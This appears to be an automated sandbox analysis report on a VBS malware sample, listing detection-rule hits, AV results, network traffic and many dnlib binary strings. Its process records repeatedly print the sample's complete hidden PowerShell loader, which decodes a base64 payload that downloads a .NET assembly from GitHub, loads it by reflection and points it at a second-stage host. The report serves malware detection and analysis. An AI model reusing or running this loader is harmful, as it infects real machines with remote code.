ycrJ250JysnZW50KTsgW2RubCcrJ2liLklPLkgnKydvJysnbWVdJysnOjpWQUkodWJ6dHh0LicrJ1InKydWJysnVlJTLzEnKycwOCcrJy8xMzEnKycuJysnNDgxJysnLjInKyczMi4yJysnNzEvLzpwdHRodScrJ2J6LCcrJyB1YicrJ3pkZXNhJysndGl2YWRvdWInKyd6LCB1YnonKydkZScrJ3NhdGknKyd2YScrJ2RvdScrJ2J6JysnLCB1YnpkZXMnKydhJysndGl2JysnYWRvdWInKyd6LCB1YnpSJysnZWdBc20nKyd1YnonKycsIHViJysneicrJ3ViJysneix1JysnYnp1JysnYicrJ3onKycpJyktY3JlUExhY0UnbWlNJyxbQ0hBcl0zOSAgLWNyZVBMYWNFIChbQ0hBcl05NytbQ0hBcl01NCtbQ0hBcl01NiksW0NIQXJdMzYgLWNyZVBMYWNFICd1YnonLFtDSEFyXTM0KSB8IC4gKCAkUFNIT21lWzIxXSskcHNIT21FWzM0XSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnYTYnKyc4JysndXJsJysnID0gJysnbWlNJysnaHR0cHMnKyc6Ly9yYScrJ3cuZ2l0aHViJysndXNlcicrJ2MnKydvbnQnKydlJysnbicrJ3QuY29tJysnL05vRGUnKyd0ZWMnKyd0T24vTm9EJysnZScrJ3RlJysnYycrJ3RPbi9yZWYnKydzLycrJ2hlJysnYWRzLycrJ21haW4vRGUnKyd0JysnYWgnKydObycrJ3RoLVYudCcrJ3h0JysnbWlNOyBhNjhiJysnYXNlNjRDb24nKyd0ZW4nKyd0ID0nKycgKE5ldycrJy0nKydPYicrJ2plJysnYycrJ3QgU3knKydzJysndGVtJysnLk5ldC5XZWJDbGknKydlbnQpJysnLicrJ0QnKydvdycrJ25sb2FkJysnU3RyaScrJ25nKGEnKyc2OHVybCknKyc7ICcrJ2E2OGJpbmFyeUMnKydvJysnbnRlJysnbnQnKycgPSBbU3lzdGVtLkNvbnZlcnRdJysnOjpGJysncm8nKydtQicrJ2EnKydzJysnZTY0U3QnKydyaW5nKGE2OGInKydhc2U2NCcrJ0NvbicrJ3QnKydlbicrJ3QpOyBhJysnNjgnKydhJysnc3NlbWJseSAnKyc9IFtSZScrJ2YnKydsZWN0aW8nKyduLkFzc2VtYmx5XScrJzo6TG9hZChhJysnNjgnKydiaW5hcicrJ3lDbycrJ250JysnZW50KTsgW2RubCcrJ2liLklPLkgnKydvJysnbWVdJysnOjpWQUkodWJ6dHh0LicrJ1InKydWJysnVlJTLzEnKycwOCcrJy8xMzEnKycuJysnNDgxJysnLjInKyczMi4yJysnNzEvLzpwdHRodScrJ2J6LCcrJyB1YicrJ3pkZXNhJysndGl2YWRvdWInKyd6LCB1YnonKydkZScrJ3NhdGknKyd2YScrJ2RvdScrJ2J6JysnLCB1YnpkZXMnKydhJysndGl2JysnYWRvdWInKyd6LCB1YnpSJysnZWdBc20nKyd1YnonKycsIHViJysneicrJ3ViJysneix1JysnYnp1JysnYicrJ3onKycpJyktY3JlUExhY0UnbWlNJyxbQ0hBcl0zOSAgLWNyZVBMYWNFIChbQ0hBcl05NytbQ0hBcl01NCtbQ0hBcl01NiksW0NIQXJdMzYgLWNyZVBMYWNFICd1YnonLFtDSEFyXTM0KSB8IC4gKCAkUFNIT21lWzIxXSskcHNIT21FWzM0XSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]:
    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\iJEK0xwucj.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\iJEK0xwucj.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\iJEK0xwucj.vbs", ProcessId: 7512, ProcessName: wscript.exe
    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnYTYnKyc4JysndXJsJysnID0gJysnbWlNJysnaHR0cHMnKyc6Ly9yYScrJ3cuZ2l0aHViJysndXNlcicrJ2MnKydvbnQnKydlJysnbicrJ3QuY29tJysnL05vRGUnKyd0ZWMnKyd0T24vTm9EJysnZScrJ3RlJysnYycrJ3RPbi9yZWYnKydzLycrJ2hlJysnYWRzLycrJ21haW4vRGUnKyd0JysnYWgnKydObycrJ3RoLVYudCcrJ3h0JysnbWlNOyBhNjhiJysnYXNlNjRDb24nKyd0ZW4nKyd0ID0nKycgKE5ldycrJy0nKydPYicrJ2plJysnYycrJ3QgU3knKydzJysndGVtJysnLk5ldC5XZWJDbGknKydlbnQpJysnLicrJ0QnKydvdycrJ25sb2FkJysnU3RyaScrJ25nKGEnKyc2OHVybCknKyc7ICcrJ2E2OGJpbmFyeUMnKydvJysnbnRlJysnbnQnKycgPSBbU3lzdGVtLkNvbnZlcnRdJysnOjpGJysncm8nKydtQicrJ2EnKydzJysnZTY0U3QnKydyaW5nKGE2OGInKydhc2U2NCcrJ0NvbicrJ3QnKydlbicrJ3QpOyBhJysnNjgnKydhJysnc3NlbWJseSAnKyc9IFtSZScrJ2YnKydsZWN0aW8nKyduLkFzc2VtYmx5XScrJzo6TG9hZChhJysnNjgnKydiaW5hcicrJ3lDbycrJ250JysnZW50KTsgW2RubCcrJ2liLklPLkgnKydvJysnbWVdJysnOjpWQUkodWJ6dHh0LicrJ1InKydWJysnVlJTLzEnKycwOCcrJy8xMzEnKycuJysnNDgxJysnLjInKyczMi4yJysnNzEvLzpwdHRodScrJ2J6LCcrJyB1YicrJ3pkZXNhJysndGl2YWRvdWInKyd6LCB1YnonKydkZScrJ3NhdGknKyd2YScrJ2RvdScrJ2J6JysnLCB1YnpkZXMnKydhJysndGl2JysnYWRvdWInKyd6LCB1YnpSJysnZWdBc20nKyd1YnonKycsIHViJysneicrJ3ViJysneix1JysnYnp1JysnYicrJ3onKycpJyktY3JlUExhY0UnbWlNJyxbQ0hBcl0zOSAgLWNyZVBMYWNFIChbQ0hBcl05NytbQ0hBcl01NCtbQ0hBcl01NiksW0NIQXJdMzYgLWNyZVBMYWNFICd1YnonLFtDSEFyXTM0KSB8IC4gKCAkUFNIT21lWzIxXSskcHNIT21FWzM0XSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnYTYnKyc4JysndXJsJysnID0gJysnbWlNJysnaHR0cHMnKyc6Ly9yYScrJ3cuZ2l0aHViJysndXNlcicrJ2MnKydvbnQnKydlJysnbicrJ3QuY29tJysnL05vRGUnKyd0ZWMnKyd0T24vTm9EJysnZScrJ3RlJysnYycrJ3RPbi9yZWYnKydzLycrJ2hlJysnYWRzLycrJ21haW4vRGUnKyd0JysnYWgnKydObycrJ3RoLVYudCcrJ3h0JysnbWlNOyBhNjhiJysnYXNlNjRDb24nKyd0ZW4nKyd0ID0nKycgKE5ldycrJy0nKydPYicrJ2plJysnYycrJ3QgU3knKydzJysndGVtJysnLk5ldC5XZWJDbGknKydlbnQpJysnLicrJ0QnKydvdycrJ25sb2FkJysnU3RyaScrJ25nKGEnKyc2OHVybCknKyc7ICcrJ2E2OGJpbmFyeUMnKydvJysnbnRlJysnbnQnKycgPSBbU3lzdGVtLkNvbnZlcnRdJysnOjpGJysncm8nKydtQicrJ2EnKydzJysnZTY0U3QnKydyaW5nKGE2OGInKydhc2U2NCcrJ0NvbicrJ3QnKydlbicrJ3QpOyBhJysnNjgnKydhJysnc3NlbWJseSAnKyc9IFtSZScrJ2YnKydsZWN0aW8nKyduLkFzc2VtYmx5XScrJzo6TG9hZChhJysnNjgnKydiaW5hcicrJ3lDbycrJ250JysnZW50KTsgW2RubCcrJ2liLklPLkgnKydvJysnbWVdJysnOjpWQUkodWJ6dHh0LicrJ1InKydWJysnVlJTLzEnKycwOCcrJy8xMzEnKycuJysnNDgxJysnLjInKyczMi4yJysnNzEvLzpwdHRodScrJ2J6LCcrJyB1YicrJ3pkZXNhJysndGl2YWRvdWInKyd6LCB1YnonKydkZScrJ3NhdGknKyd2YScrJ2RvdScrJ2J6JysnLCB1YnpkZXMnKydhJysndGl2JysnYWRvdWInKyd6LCB1YnpSJysnZWdBc20nKyd1YnonKycsIHViJysneicrJ3ViJysneix1JysnYnp1JysnYicrJ3onKycpJyktY3JlUExhY0UnbWlNJyxbQ0hBcl0zOSAgLWNyZVBMYWNFIChbQ0hBcl05NytbQ0hBcl01NCtbQ0hBcl01NiksW0NIQXJdMzYgLWNyZVBMYWNFICd1YnonLFtDSEFyXTM0KSB8IC4gKCAkUFNIT21lWzIxXSskcHNIT21FWzM0XSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]:
    Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\iJEK0xwucj.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\iJEK0xwucj.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\iJEK0xwucj.vbs", ProcessId: 7512, ProcessName: wscript.exe
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnYTYnKyc4JysndXJsJysnID0gJysnbWlNJysnaHR0cHMnKyc6Ly9yYScrJ3cuZ2l0aHViJysndXNlcicrJ2MnKydvbnQnKydlJysnbicrJ3QuY29tJysnL05vRGUnKyd0ZWMnKyd0T24vTm9EJysnZScrJ3RlJysnYycrJ3RPbi9yZWYnKydzLycrJ2hlJysnYWRzLycrJ21haW4vRGUnKyd0JysnYWgnKydObycrJ3RoLVYudCcrJ3h0JysnbWlNOyBhNjhiJysnYXNlNjRDb24nKyd0ZW4nKyd0ID0nKycgKE5ldycrJy0nKydPYicrJ2plJysnYycrJ3QgU3knKydzJysndGVtJysnLk5ldC5XZWJDbGknKydlbnQpJysnLicrJ0QnKydvdycrJ25sb2FkJysnU3RyaScrJ25nKGEnKyc2OHVybCknKyc7ICcrJ2E2OGJpbmFyeUMnKydvJysnbnRlJysnbnQnKycgPSBbU3lzdGVtLkNvbnZlcnRdJysnOjpGJysncm8nKydtQicrJ2EnKydzJysnZTY0U3QnKydyaW5nKGE2OGInKydhc2U2NCcrJ0NvbicrJ3QnKydlbicrJ3QpOyBhJysnNjgnKydhJysnc3NlbWJseSAnKyc9IFtSZScrJ2YnKydsZWN0aW8nKyduLkFzc2VtYmx5XScrJzo6TG9hZChhJysnNjgnKydiaW5hcicrJ3lDbycrJ250JysnZW50KTsgW2RubCcrJ2liLklPLkgnKydvJysnbWVdJysnOjpWQUkodWJ6dHh0LicrJ1InKydWJysnVlJTLzEnKycwOCcrJy8xMzEnKycuJysnNDgxJysnLjInKyczMi4yJysnNzEvLzpwdHRodScrJ2J6LCcrJyB1YicrJ3pkZXNhJysndGl2YWRvdWInKyd6LCB1YnonKydkZScrJ3NhdGknKyd2YScrJ2RvdScrJ2J6JysnLCB1YnpkZXMnKydhJysndGl2JysnYWRvdWInKyd6LCB1YnpSJysnZWdBc20nKyd1YnonKycsIHViJysneicrJ3ViJysneix1JysnYnp1JysnYicrJ3onKycpJyktY3JlUExhY0UnbWlNJyxbQ0hBcl0zOSAgLWNyZVBMYWNFIChbQ0hBcl05NytbQ0hBcl01NCtbQ0hBcl01NiksW0NIQXJdMzYgLWNyZVBMYWNFICd1YnonLFtDSEFyXTM0KSB8IC4gKCAkUFNIT21lWzIxXSskcHNIT21FWzM0XSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnYTYnKyc4JysndXJsJysnID0gJysnbWlNJysnaHR0cHMnKyc6Ly9yYScrJ3cuZ2l0aHViJysndXNlcicrJ2MnKydvbnQnKydlJysnbicrJ3QuY29tJysnL05vRGUnKyd0ZWMnKyd0T24vTm9EJysnZScrJ3RlJysnYycrJ3RPbi9yZWYnKydzLycrJ2hlJysnYWRzLycrJ21haW4vRGUnKyd0JysnYWgnKydObycrJ3RoLVYudCcrJ3h0JysnbWlNOyBhNjhiJysnYXNlNjRDb24nKyd0ZW4nKyd0ID0nKycgKE5ldycrJy0nKydPYicrJ2plJysnYycrJ3QgU3knKydzJysndGVtJysnLk5ldC5XZWJDbGknKydlbnQpJysnLicrJ0QnKydvdycrJ25sb2FkJysnU3RyaScrJ25nKGEnKyc2OHVybCknKyc7ICcrJ2E2OGJpbmFyeUMnKydvJysnbnRlJysnbnQnKycgPSBbU3lzdGVtLkNvbnZlcnRdJysnOjpGJysncm8nKydtQicrJ2EnKydzJysnZTY0U3QnKydyaW5nKGE2OGInKydhc2U2NCcrJ0NvbicrJ3QnKydlbicrJ3QpOyBhJysnNjgnKydhJysnc3NlbWJseSAnKyc9IFtSZScrJ2YnKydsZWN0aW8nKyduLkFzc2VtYmx5XScrJzo6TG9hZChhJysnNjgnKydiaW5hcicrJ3lDbycrJ250JysnZW50KTsgW2RubCcrJ2liLklPLkgnKydvJysnbWVdJysnOjpWQUkodWJ6dHh0LicrJ1InKydWJysnVlJTLzEnKycwOCcrJy8xMzEnKycuJysnNDgxJysnLjInKyczMi4yJysnNzEvLzpwdHRodScrJ2J6LCcrJyB1YicrJ3pkZXNhJysndGl2YWRvdWInKyd6LCB1YnonKydkZScrJ3NhdGknKyd2YScrJ2RvdScrJ2J6JysnLCB1YnpkZXMnKydhJysndGl2JysnYWRvdWInKyd6LCB1YnpSJysnZWdBc20nKyd1YnonKycsIHViJysneicrJ3ViJysneix1JysnYnp1JysnYicrJ3onKycpJyktY3JlUExhY0UnbWlNJyxbQ0hBcl0zOSAgLWNyZVBMYWNFIChbQ0hBcl05NytbQ0hBcl01NCtbQ0hBcl01NiksW0NIQXJdMzYgLWNyZVBMYWNFICd1YnonLFtDSEFyXTM0KSB8IC4gKCAkUFNIT21lWzIxXSskcHNIT21FWzM0XSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]:
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtVirustotal: Detection: 6%Perma Link
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.8% probability
    Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.7:49699 version: TLS 1.2
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000004.00000002.1825456759.00007FFAAC7A0000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: *.pdbQ source: powershell.exe, 00000004.00000002.1818349189.000001783941B000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1817018540.00000178390AF000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: n.pdb source: powershell.exe, 00000004.00000002.1817018540.00000178390AF000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000004.00000002.1818818016.000001783947D000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000004.00000002.1818818016.000001783947D000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000004.00000002.1825456759.00007FFAAC7A0000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
